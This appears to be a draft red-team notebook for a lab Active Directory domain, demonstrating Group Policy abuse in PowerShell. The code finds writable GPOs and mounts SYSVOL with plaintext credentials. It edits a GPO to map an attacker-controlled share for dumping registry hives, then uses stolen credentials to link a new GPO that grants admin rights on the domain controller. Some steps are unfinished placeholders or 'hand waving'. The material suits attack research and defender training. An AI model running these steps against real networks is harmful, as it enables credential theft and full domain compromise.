## GPO Overview
Group Policy is a mechanism for deploying computer and user specific configuration across multiple machines within a network. Another way to think of Group Policy is in its name - configuration policies applied to groups of users and computers. These configuration policies, or GPOs, are stored both as a collection of files on a network share, and as an object within Active Directory.

The network share where group policy files are stored is known as SYSVOL, and each GPO  has a specifc folder on this share, referred to as the Group Policy Template or GPT. The contents of the GPT are replicated across all domain controllers in the domain, so feasibly all DCs should have the copy of the same GPOs files. The GPT is where the majority of the configuration policies listed in a GPO will be stored. 

The AD object for the GPO is called the Group Policy Container or GPC. The GPC contains information such as version of the GPO, whether it is disabled, and XXXXXXXXXXXX

Both the portion of the GPO that is stored on the SYSVOL share (its GPT) and the portion stored as an AD object (its GPC) are named with a unique 128-bit GUID. This is separate from the human readable 'friendly' name and means the GPO will always be unique identifiable within the domain. However, this GUID 'name' is similar across Active Directory deployments, so GPOs also have a second, globally unique 128-bit GUID.

## GPO Recon
Imagine we have acces to this account

In [7]:
$dirEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://dc01.gpoabuse.lab", "gpoabuse.lab\john.dee", "johnsPass01")
$searcher = New-Object System.DirectoryServices.DirectorySearcher($dirEntry)
$searcher.Filter = "(&(objectCategory=user)(samAccountName=john.dee))"
$results = $searcher.FindOne()
$results.Properties.distinguishedname
"Groups:"
foreach ($group in $($results.Properties.memberof)) {
    "    $group"
}

CN=John Dee,CN=Users,DC=gpoabuse,DC=lab
Groups:
    CN=Office Admins,CN=Users,DC=gpoabuse,DC=lab


Get SID of users group

In [8]:
$searcher.Filter = "(&(objectCategory=group)(cn=Office Admins))"
$results = $searcher.FindOne()
$groupSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$results.Properties.objectsid[0],0))
$groupSID.Value

S-1-5-21-3803290057-1540762572-187816911-1107


Check what GPOs this group has access to

In [9]:
$searcher.Filter = "(objectCategory=groupPolicyContainer)"
$searcher.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
$groupPolicyObjects = $searcher.FindAll() 

foreach ($gpo in $groupPolicyObjects) {
    # Get the ACL from the binary nTSecurityDescriptor property
    $SecurityDescriptor = New-Object System.DirectoryServices.ActiveDirectorySecurity
    $SecurityDescriptor.SetSecurityDescriptorBinaryForm([Byte[]]$gpo.Properties["nTSecurityDescriptor"][0])
    $gpoACL = $SecurityDescriptor.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])

    # Iterate through the ACLs of each GPO, looking for the targetSID
    foreach ($ace in $gpoACL) {
        if ($ace.IdentityReference.CompareTo($groupSID) -eq 0) {
            $gpoDN = $gpo.Properties.distinguishedname
            $gpoDisplayName = $gpo.Properties.displayname
            $gpoPath = $gpo.Properties.adspath
            Write-Host "$($ace.AccessControlType) -> $($ace.ActiveDirectoryRights) on GPO '$gpoDisplayName'"
        }
    }
}
$dirEntry.Dispose()
$groupPolicyObjects.Dispose()

Allow -> CreateChild, DeleteChild, ReadProperty, WriteProperty, GenericExecute on GPO 'SetWallapper'


GPO linking - examine how this GPO is linked to the OU, meaning it will apply to all machines in that OU. gpLink is an attribute on the OU object, not the GPO.

In [ ]:
$dirEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://dc01.gpoabuse.lab", "gpoabuse.lab\john.dee", "johnsPass01")
$searcher = New-Object System.DirectoryServices.DirectorySearcher($dirEntry)
$searcher.Filter = "(objectCategory=organizationalUnit)"
$ouResult = $searcher.FindAll()
ForEach ($ou in $ouResult) {
    if (($ou.Properties.gplink) -match $gpoDN) {
        "'$gpoDisplayName' is linked to $($ou.Properties.name)"
    }
}

$dirEntry.Dispose()
$ouResult.Dispose()

GPC Internals - examine the GPO

GPOs have a name which is a GUID inside curly braces. These are the same in across Active Directory environments, so GPOs also have a globally unique objectGUID. The GPT for a GPO is named after the 'name' GUID

In [ ]:
$gpoEntry = New-Object System.DirectoryServices.DirectoryEntry($gpoPath, "gpoabuse.lab\john.dee", "johnsPass01")
$gpoEntry | Format-List name, distinguishedname, @{ n='objectGUID'; e={New-Object System.Guid($_.objectGUID)} }, objectCategory, gPCFileSysPath, versionnumber
$gpoGUID = $gpoEntry.Properties['name']

Mount sysvol as if we were a domain joined machine - opsec consideration that this mount is not done with a machine account??

In [ ]:
New-SmbMapping -Localpath "Z:" -RemotePath "\\dc01.gpoabuse.lab\SysVol\gpoabuse.lab\Policies\" -UserName "gpoabuse\john.dee" -Password "johnsPass01"

Now we have this mounted we can examine the GPO files contained in the GPT

In [ ]:
Set-Location Z:\$gpoGUID
Get-ChildItem .

Talk about what each file means broadly

ini - config
cmt - comments
user/registry.pol - user registry settings

In [ ]:
"Office Admins SID: $($groupSID.Value)`n"

Write-Host -NoNewLine "=== Z:\$gpoGUID ===" 
(Get-ACL Z:\$gpoGUID).Access | where { $_.IdentityReference -match $groupSID } | Format-List -Property FileSystemRights, AccessControlType, IdentityReference, IsInherited

ForEach ($item in Get-Childitem Z:\$gpoGUID) {
    Write-Host -NoNewLine "=== $item ==="
    (Get-ACL $item).Access | where { $_.IdentityReference -match $groupSID } | Format-List -Property FileSystemRights, AccessControlType, IdentityReference, IsInherited
}

See we have write on these files!

In [ ]:
$literalPath = Get-Location
$cmt = [System.Text.Encoding]::Unicode.GetString([System.IO.File]::ReadAllBytes("$literalPath\GPO.cmt"))
$regBytes = [System.IO.File]::ReadAllBytes("$literalPath\User\Registry.pol")
$signature = [System.Text.Encoding]::ASCII.GetString($regBytes[0..3])
$version = [System.BitConverter]::ToInt32($regBytes, 4)
$regEntries = [System.Text.Encoding]::Unicode.GetString($regBytes[8..($regBytes.Length-1)]) -replace '[\x00-\x1F]', ' ' -replace '\s+', ' '

In [ ]:
Write-Host "`n=== GPT.INI ===`n" 
Get-Content "$literalPath\GPT.INI"
Write-Host "`n=== GPO.cmt ===`n"
Write-Host $cmt
Write-Host "`n=== Registry.pol ===`n"
Write-Host "Header Information:"
Write-Host "Signature: $signature"
Write-Host "Version: $version"
Write-Host "`nRegistry Entries:"
Write-Host $regEntries

Talk about contents - need some tidier code to enum the GPO

Explain we will modify this GPO to run a scheduled task to dump hives and move them to a share, that the GPO will also mount

Show that the share has been setup

In [6]:
Get-SmbShare -Name Temp
(Get-NetIPAddress -InterfaceAlias *gpoabuse*).IPAddress


Name ScopeName Path         Description
---- --------- ----         -----------
Temp *         C:\tempShare 
192.168.6.1



## Modifying a GPO by hand

In [ ]:
$attackerShare = "\\192.168.6.1\tmpPrinter"

$drivesXml = @"
<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{8FDDCC1A-0C3C-43cd-A6B4-71A6DF20DA8C}"><Drive clsid="{935D1B74-9CB8-4e3c-9914-7DD559B7A417}" name="G:" status="G:" image="2" changed="2023-11-05 12:00:00" uid="{11111111-1111-1111-1111-111111111111}">
    <Properties action="U" thisDrive="NOCHANGE" allDrives="NOCHANGE" userName="" path=$attackerShare label="" persistent="0" useLetter="1" letter="G"/></Drive>
</Drives>
"@

$preferencesPath = "$literalPath\User\Preferences\Drives"
if (Test-Path $preferencesPath) {
    # do nothing
} else {
    New-Item -Path $preferencesPath -ItemType Directory -Force
}
Set-Content -Path "$preferencesPath\Drives.xml" -Value $drivesXml

$gptINI = "$literalPath\GPT.INI"
Set-Content -Path $gptINI -Value $((Get-Content $gptINI) -replace "Version=\d+", "Version=1337")

$gpoEntry.versionNumber = 1337
$gpoEntry.CommitChanges()

In [ ]:
$gpoEntry = New-Object System.DirectoryServices.DirectoryEntry($gpoPath, "gpoabuse.lab\john.dee", "johnsPass01")
$gpoEntry.versionNumber

Once the GPO has been modified, we will force a gpupdate, and show the share now has the registry hives in it

hand waving at this point - we just can rather than show that the hives contained creds for the user jim.duggan, examining jims account shows he is part of the site policy admins group

In [ ]:
$credential = New-Object PSCredential("gpoabuse.lab\jim.duggan", $(ConvertTo-SecureString "jimsPass01" -AsPlainText -Force))
Invoke-Command -ComputerName ws01.gpoabuse.lab -ScriptBlock { 
    whoami /all 
} -Credential $credential

do some recon to show site policy admins can link against the site Dunwhich, then do some recon to show the DC is in that site

In [ ]:
Invoke-Command -ComputerName ws01.gpoabuse.lab -ScriptBlock { 
    Get-WindowsCapability -Name RSAT* -Online | Select-Object -Property DisplayName, State 
} -Credential $credential

In [ ]:
Invoke-Command -ComputerName ws01.gpoabuse.lab -ScriptBlock {
    Get-ADObject -LDAPFilter "(objectClass=site)"
} -Credential $credential 

New GPO to add jim duggan to the local admins restricted group on the DC, which is then linked to the site

In [ ]:
New-GPO -Name "PrinterUpdate" -Domain "gpoabuse.lab" -DC "dc01.gpoabuse.lab" -Credential $credential
\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
Set-GPLink -Target "Dunwhich"

PWNED

In [ ]:
$credential = New-Object PSCredential("gpoabuse.lab\jim.duggan", $(ConvertTo-SecureString "jimsPass01" -AsPlainText -Force))
Invoke-Command -ComputerName dc01.gpoabuse.lab -ScriptBlock { whoami /all } -Credential $credential

## Futher Reading

MS docs on how group policy works:
- [Group Policy Architecture](https://learn.microsoft.com/en-us/previous-versions/windows/desktop/policy/group-policy-architecture)
- [Mapped Drives XML](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/1b0df77e-9f78-4be0-b55a-988ac916b425)
- [Scheduled Tasks XML](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/850b333b-9336-496a-bf93-a20f33748454)

Some excellent sources for understandng GPO internals: 
- [A Red Teamers Guide to GPOs and OUs](https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e)
- [GPO Abuse Part 1](https://web.archive.org/web/20200109143823/https://rastamouse.me/2019/01/gpo-abuse-part-1/)
- [GPO Abuse Part 2](https://web.archive.org/web/20200330100149/http://rastamouse.me/2019/01/gpo-abuse-part-2/)
- [Exploitating Windows Group Policy for Reconnaissance and Attack](https://www.youtube.com/watch?v=eoBeRkpj6TE)
- [Understanding Group Policy Storage](https://sdmsoftware.com/whitepapers/understanding-group-policy-storage/)

A nice overview of GPO persistence:
- [Sneaky Active Directory Persistence #17: Group Policy](https://adsecurity.org/?p=2716)